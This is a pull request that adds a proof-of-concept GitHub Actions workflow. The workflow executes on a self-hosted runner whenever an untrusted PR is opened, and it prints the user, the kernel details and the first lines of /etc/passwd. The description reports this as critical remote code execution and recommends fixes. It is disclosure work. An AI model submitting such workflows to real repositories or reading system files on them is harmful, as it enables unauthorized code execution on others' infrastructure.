### PR TITLE
[PoC] Demonstrating self-hosted runner takeover risk

### DIFF
--- a/.github/workflows/safe-poc.yml
+++ b/.github/workflows/safe-poc.yml
@@ -1,0 +1,17 @@
+name: PoC — Self-Hosted Runner RCE
+
+on:
+  pull_request:
+
+jobs:
+  poc-rce:
+    runs-on: self-hosted
+
+    steps:
+      - name: Proof of Code Execution on Self-Hosted Runner
+        run: |
+          echo "✅ Arbitrary code execution proof"
+          echo "[whoami] $(whoami)"
+          echo "[kernel] $(uname -a)"
+          echo "[/etc/passwd preview]"
+          head -n 10 /etc/passwd


### PR DESCRIPTION
## Summary
This pull request adds a proof-of-concept workflow (`.github/workflows/poc.yml`) that runs on `pull_request` events.

The job is configured with `runs-on: self-hosted`, meaning that any external contributor (like me) can open a PR and execute arbitrary code on the self-hosted runner infrastructure.

## Proof of Code Execution
The workflow prints:
- The current user (`whoami`)
- Kernel and OS details (`uname -a`)
- First 10 lines of `/etc/passwd`

This demonstrates that untrusted PR code is executed directly on the self-hosted machine, not in a GitHub-hosted ephemeral runner.

## Security Impact
An attacker could:
- Run arbitrary commands on the self-hosted host.
- Access the Docker daemon (if mounted), leading to full host compromise.
- Pivot into internal systems reachable from the runner.

This confirms **CRITICAL severity: RCE on self-hosted runner via untrusted PR**.

## Recommendation
- Do not run untrusted PR workflows on `self-hosted` runners.
- Restrict self-hosted usage to trusted branches/users.
- Use GitHub-hosted runners for forked PRs.
